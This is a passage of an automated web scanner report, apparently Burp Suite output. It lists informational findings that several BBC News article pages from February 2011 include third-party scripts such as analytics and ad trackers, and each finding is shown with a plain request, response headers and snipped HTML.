Path:   /news/world-12428938

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-12428938 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:02 GMT
Keep-Alive: timeout=10, max=774
Expires: Sat, 12 Feb 2011 02:03:02 GMT
Connection: close
Set-Cookie: BBC-UID=84fd55c5be8a45861a36943741935ca2439c915400b0315a845b9ac5adf066540Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:02 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=84fd55c5be8a45861a36943741935ca2439c915400b0315a845b9ac5adf066540Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:02 GMT; path=/; domain=bbc.co.uk;
Content-Length: 48497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.33. http://www.bbc.co.uk/news/world-12434787  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12434787

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-12434787 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=24ed25d55e2ad5acca13b58c817fe390a92b4a8bb0d051baf4cbeaf6172427f80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24ed25d55e2ad5acca13b58c817fe390a92b4a8bb0d051baf4cbeaf6172427f80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.34. http://www.bbc.co.uk/news/world-africa-12427390  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12427390

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-africa-12427390 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:12 GMT
Keep-Alive: timeout=10, max=769
Expires: Sat, 12 Feb 2011 02:03:12 GMT
Connection: close
Set-Cookie: BBC-UID=448d5515aeaa16607b199c37f1baf5fde8cc790860a0c15a34cbaa84bcee08ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:12 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448d5515aeaa16607b199c37f1baf5fde8cc790860a0c15a34cbaa84bcee08ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:12 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.35. http://www.bbc.co.uk/news/world-africa-12430115  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12430115

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-africa-12430115 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:13 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:03:13 GMT
Connection: close
Set-Cookie: BBC-UID=64bde5855e8ae6517afa052d01ec189ea6deab7710e061190b6b73de1e4bccce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:13 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64bde5855e8ae6517afa052d01ec189ea6deab7710e061190b6b73de1e4bccce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:13 GMT; path=/; domain=bbc.co.uk;
Content-Length: 71002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.36. http://www.bbc.co.uk/news/world-africa-12432292  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12432292

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-africa-12432292 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:14 GMT
Keep-Alive: timeout=10, max=766
Expires: Sat, 12 Feb 2011 02:03:14 GMT
Connection: close
Set-Cookie: BBC-UID=a48db555ceaae6e26a91696fb16ce7ea3160fa6290c011a9db6b13d2877d290e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a48db555ceaae6e26a91696fb16ce7ea3160fa6290c011a9db6b13d2877d290e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.37. http://www.bbc.co.uk/news/world-africa-12433674  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12433674

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-africa-12433674 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:15 GMT
Keep-Alive: timeout=10, max=795
Expires: Sat, 12 Feb 2011 02:03:15 GMT
Connection: close
Set-Cookie: BBC-UID=b49dc5250e4ac6c31addca0b61e264006ce8ae32b0903179fbbbe34e00fe142c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b49dc5250e4ac6c31addca0b61e264006ce8ae32b0903179fbbbe34e00fe142c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.38. http://www.bbc.co.uk/news/world-asia-pacific-12427423  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12427423

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-asia-pacific-12427423 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:15 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:03:15 GMT
Connection: close
Set-Cookie: BBC-UID=c4bd45359e0a96d39bdab94fe197cbb303017fbb8090319ad46b7ab4201c36e20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c4bd45359e0a96d39bdab94fe197cbb303017fbb8090319ad46b7ab4201c36e20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.39. http://www.bbc.co.uk/news/world-asia-pacific-12428385  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12428385

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-asia-pacific-12428385 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:16 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:16 GMT
Connection: close
Set-Cookie: BBC-UID=540d4555ce6a66b41addfebcc1cf7b51cb680fed706021e9eb6bc34f137543320Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=540d4555ce6a66b41addfebcc1cf7b51cb680fed706021e9eb6bc34f137543320Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.40. http://www.bbc.co.uk/news/world-asia-pacific-12430671  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12430671

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-asia-pacific-12430671 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:16 GMT
Keep-Alive: timeout=10, max=774
Expires: Sat, 12 Feb 2011 02:03:16 GMT
Connection: close
Set-Cookie: BBC-UID=54fd85a5eeea96440a01fa9f5119eda96a816e5ee02051c96beb130277ad09fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=54fd85a5eeea96440a01fa9f5119eda96a816e5ee02051c96beb130277ad09fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.41. http://www.bbc.co.uk/news/world-europe-12429539  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-12429539

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-europe-12429539 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:17 GMT
Keep-Alive: timeout=10, max=777
Expires: Sat, 12 Feb 2011 02:03:17 GMT
Connection: close
Set-Cookie: BBC-UID=645d75e54e2ae6950bd78b4f51e88217bb2fc0f84050e1ea845bda9523212a8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=645d75e54e2ae6950bd78b4f51e88217bb2fc0f84050e1ea845bda9523212a8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

